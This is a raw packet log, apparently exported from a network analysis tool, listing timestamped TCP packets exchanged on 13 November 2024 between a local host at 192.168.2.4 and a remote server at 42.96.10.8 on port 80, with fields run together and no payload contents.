                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155872107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155976057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156009912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156024933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156054020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156147003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156174898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156188965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156191111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156234026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156330109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156343937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156359911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156377077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156387091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156392097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156409979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156419039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156428099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156441927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156455040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156471014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156480074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156490088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156507969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156529903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156606913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156625032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156651020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156651020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156668901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156677008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156702042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156721115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156745911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156759977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156837940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156855106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156868935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156878948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156915903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156960964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156977892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.156995058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157001972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157037973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157072067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157093048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157110929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157135010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157174110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157197952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157216072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157217026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157233953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157263041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157299995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157316923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157332897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157342911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157350063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157375097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157511950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157527924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157545090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157547951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.157578945 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207376957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207401037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207417011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207432985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207441092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207451105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207467079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207489967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207504988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207513094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207535028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207577944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207593918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207611084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207619905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207624912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207638979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207642078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207664013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207670927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207686901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207701921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207716942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207731009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207734108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207745075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207750082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207767010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207771063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207787037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207801104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207807064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207818985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207832098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207847118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.207868099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.239247084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.239270926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.239301920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.239351034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.247926950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.247942924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.247960091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.247968912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.248007059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.248008966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249439955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249454975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249473095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249481916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249506950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249533892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249551058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249567986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249583006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249588966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.249634981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268343925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268377066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268393040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268408060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268424034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268435001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268440008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268459082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268471956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268488884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268490076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268506050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268522024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268526077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268539906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268556118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268558025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268587112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268625021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268770933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268788099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268815994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268816948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268831968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268850088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268855095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268867016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268887997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268898964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268913984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268929958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268944979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268958092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268965006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268975019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.268990993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269013882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269043922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269087076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269100904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269102097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269144058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269160986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269175053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269182920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269185066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269222021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269232035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269279003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269295931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269311905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269326925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269332886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269345999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269367933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269438028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269455910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269471884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269488096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269491911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269511938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269526958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269542933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269558907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269565105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269573927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269589901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269606113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269617081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269639015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269651890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269668102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269681931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269711971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269721031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269737005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269762039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269778967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269814014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269865990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269882917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269900084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269917011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269923925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.269942999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270036936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270051003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270066977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270076036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270083904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270101070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270102978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270117044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270136118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270145893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270169020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270198107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270206928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270215034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270227909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270236015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270245075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270261049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270282984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270299911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270334005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270350933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270365953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270384073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270401001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270405054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270425081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270445108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270462036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270483971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270488024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270503998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270519018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270534992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270555973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270593882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270608902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270623922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.270649910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271156073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271212101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271322966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271338940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271367073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271380901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271382093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271399975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271415949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271431923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271436930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271447897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271461964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271465063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271482944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271483898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271498919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271517992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271533966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271542072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271550894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271558046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271568060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271585941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271591902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271622896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271651983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271667957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271682024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271697044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271697044 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271737099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271802902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271819115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271833897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271847963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271863937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271871090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271881104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.271891117 CET4973380192.168.2.442.96.10.8
